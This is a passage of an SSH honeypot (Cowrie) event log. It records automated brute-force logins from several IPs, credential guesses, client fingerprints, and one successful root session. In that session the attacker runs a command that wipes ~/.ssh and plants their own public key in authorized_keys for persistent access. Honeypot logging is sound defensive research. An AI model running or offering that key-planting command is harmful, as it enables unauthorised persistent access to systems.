-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:40:09.008737Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123321","message":"login attempt [root/qq123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:40:09.852336Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:40:10.275040Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:40:10.275926Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:40:10.277057Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:10.480101Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:40:10.990501Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:40:10.991348Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:40:11.194989Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:11.196202Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":54842,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea58700f4ad1","protocol":"ssh","message":"New connection: 118.26.39.178:54842 (1.2.3.4:22) [session: ea58700f4ad1]","sensor":"my-vps","timestamp":"2025-09-09T06:40:11.509313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:40:11.510343Z","src_ip":"118.26.39.178","session":"ea58700f4ad1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:40:11.766128Z","src_ip":"118.26.39.178","session":"ea58700f4ad1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:40:12.827337Z","src_ip":"118.26.39.178","session":"ea58700f4ad1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:14.090635Z","src_ip":"118.26.39.178","session":"ea58700f4ad1"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":54846,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb7b7874ba9e","protocol":"ssh","message":"New connection: 118.26.39.178:54846 (1.2.3.4:22) [session: fb7b7874ba9e]","sensor":"my-vps","timestamp":"2025-09-09T06:40:14.229878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:40:14.230905Z","src_ip":"118.26.39.178","session":"fb7b7874ba9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:40:14.429919Z","src_ip":"118.26.39.178","session":"fb7b7874ba9e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:40:15.239944Z","src_ip":"118.26.39.178","session":"fb7b7874ba9e"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:15.441203Z","src_ip":"118.26.39.178","session":"f992ac39357b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:15.692317Z","src_ip":"118.26.39.178","session":"fb7b7874ba9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54244,"dst_ip":"1.2.3.4","dst_port":22,"session":"b85fe2a623bd","protocol":"ssh","message":"New connection: 212.227.235.229:54244 (1.2.3.4:22) [session: b85fe2a623bd]","sensor":"my-vps","timestamp":"2025-09-09T06:40:30.290730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:40:30.291457Z","src_ip":"212.227.235.229","session":"b85fe2a623bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:40:30.408289Z","src_ip":"212.227.235.229","session":"b85fe2a623bd"}
{"eventid":"cowrie.login.failed","username":"user","password":"user@2025","message":"login attempt [user/user@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:40:30.920314Z","src_ip":"212.227.235.229","session":"b85fe2a623bd"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:40:32.038558Z","src_ip":"212.227.235.229","session":"b85fe2a623bd"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":35194,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae9a37e91ee4","protocol":"ssh","message":"New connection: 157.20.207.165:35194 (1.2.3.4:22) [session: ae9a37e91ee4]","sensor":"my-vps","timestamp":"2025-09-09T06:41:01.916862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:41:01.917755Z","src_ip":"157.20.207.165","session":"ae9a37e91ee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58192,"dst_ip":"1.2.3.4","dst_port":22,"session":"4529168f9d5d","protocol":"ssh","message":"New connection: 212.227.235.229:58192 (1.2.3.4:22) [session: 4529168f9d5d]","sensor":"my-vps","timestamp":"2025-09-09T06:41:01.949753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:41:01.951004Z","src_ip":"212.227.235.229","session":"4529168f9d5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:41:02.102617Z","src_ip":"157.20.207.165","session":"ae9a37e91ee4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:41:02.195719Z","src_ip":"212.227.235.229","session":"4529168f9d5d"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps@2025","message":"login attempt [apps/apps@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:41:02.837945Z","src_ip":"157.20.207.165","session":"ae9a37e91ee4"}
{"eventid":"cowrie.login.failed","username":"dell","password":"111","message":"login attempt [dell/111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:41:03.788471Z","src_ip":"212.227.235.229","session":"4529168f9d5d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:04.023172Z","src_ip":"157.20.207.165","session":"ae9a37e91ee4"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:05.034610Z","src_ip":"212.227.235.229","session":"4529168f9d5d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:16.201633Z","src_ip":"212.227.125.160","session":"ee7b1a46ca86"}
{"eventid":"cowrie.session.closed","duration":180.16162276268005,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:16.205571Z","src_ip":"212.227.125.160","session":"ee7b1a46ca86"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50818,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e2a381886f3","protocol":"ssh","message":"New connection: 217.72.205.35:50818 (1.2.3.4:22) [session: 8e2a381886f3]","sensor":"my-vps","timestamp":"2025-09-09T06:41:25.809124Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:25.810352Z","src_ip":"217.72.205.35","session":"8e2a381886f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55032,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eb3a7d8862a","protocol":"ssh","message":"New connection: 212.227.235.229:55032 (1.2.3.4:22) [session: 2eb3a7d8862a]","sensor":"my-vps","timestamp":"2025-09-09T06:41:34.369225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:41:34.371253Z","src_ip":"212.227.235.229","session":"2eb3a7d8862a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:41:34.485176Z","src_ip":"212.227.235.229","session":"2eb3a7d8862a"}
{"eventid":"cowrie.login.failed","username":"hack","password":"12345","message":"login attempt [hack/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T06:41:34.946049Z","src_ip":"212.227.235.229","session":"2eb3a7d8862a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:36.065066Z","src_ip":"212.227.235.229","session":"2eb3a7d8862a"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":36802,"dst_ip":"1.2.3.4","dst_port":22,"session":"5987e6e3ac3b","protocol":"ssh","message":"New connection: 118.26.39.178:36802 (1.2.3.4:22) [session: 5987e6e3ac3b]","sensor":"my-vps","timestamp":"2025-09-09T06:41:38.210000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:41:38.210930Z","src_ip":"118.26.39.178","session":"5987e6e3ac3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:41:38.411442Z","src_ip":"118.26.39.178","session":"5987e6e3ac3b"}
{"eventid":"cowrie.login.failed","username":"alex","password":"Password","message":"login attempt [alex/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T06:41:39.221532Z","src_ip":"118.26.39.178","session":"5987e6e3ac3b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:41:40.425081Z","src_ip":"118.26.39.178","session":"5987e6e3ac3b"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":33694,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6839389d36e","protocol":"ssh","message":"New connection: 157.20.207.165:33694 (1.2.3.4:22) [session: e6839389d36e]","sensor":"my-vps","timestamp":"2025-09-09T06:42:14.440205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:42:14.441416Z","src_ip":"157.20.207.165","session":"e6839389d36e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:42:14.624962Z","src_ip":"157.20.207.165","session":"e6839389d36e"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"111111","message":"login attempt [mysql/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:42:15.402174Z","src_ip":"157.20.207.165","session":"e6839389d36e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53706,"dst_ip":"1.2.3.4","dst_port":22,"session":"23293c2006e0","protocol":"ssh","message":"New connection: 212.227.235.229:53706 (1.2.3.4:22) [session: 23293c2006e0]","sensor":"my-vps","timestamp":"2025-09-09T06:42:16.064775Z"}
